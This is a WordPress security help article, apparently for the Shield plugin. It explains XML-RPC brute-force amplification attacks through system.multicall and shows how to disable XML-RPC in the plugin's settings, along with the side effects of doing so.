How to automatically block XML-RPC brute force amplification attacks against WordPress

XML-RPC is enabled by default in WordPress because it helps connecting your WordPress site with web and mobile apps.

However because of it’s powerful nature, XML-RPC can significantly amplify the brute-force attacks.

What does "amplified brute-force attack" mean?

This means instead of trying thousands of usernames and password combinations via login page, hackers can use the XML-RPC protocol in conjunction with the system.multicall method that allows them to:

  • Go undetected by normal brute-force mitigation products
  • Try hundreds of thousands of username and password combinations with few XML-RPC requests.

Recommendation: If you don’t use XML-RPC at all, perhaps best thing you can do is to disable it.

How to block brute force login attacks over XML-RPC

You can have Shield to help you with this. Simply go to the Lockdown module > API & XML-RPC > and enable "Disable The XML-RPC System" option:

You’ll now be protected against any possible XML-RPC brute force login attacks.

Hint: If you want to check and confirm XML-RPC functionality is disabled, you can

  1. Go to:
  2. Enter your WordPress site URL in the ‘Address’ field
  3. Click the ‘Check’ button.

You should receive a response page detailing how your XML-RPC server isn’t available.

Note: The message "XML-RPC server accepts POST requests only." is output well before any XML-RPC processing actually occurs. If you perform a POST request (which is what this message says is supported), you'll find an entirely different response, one that indicates the XML-RPC system is disabled.

What are the implications of disabling the WordPress XML-RPC system?

You should be aware of what may be affected by disabling the XML-RPC system on your WordPress site:

  • Certain JetPack plugin functionality will be impacted
  • The mobile Android/IOS apps will be broken with your site since they run over the XML-RPC system
  • Any other system or plugin that uses your site’s XML-RPC system to communicate and operate your site.

Note: There is an option to allow login through XML-RPC to by-pass accounts management rules. This is offered for users who want to be compatible with other services (as outlined above).

To learn more about WordPress XMP-RPC, why and how to block attacks, read this blog article here.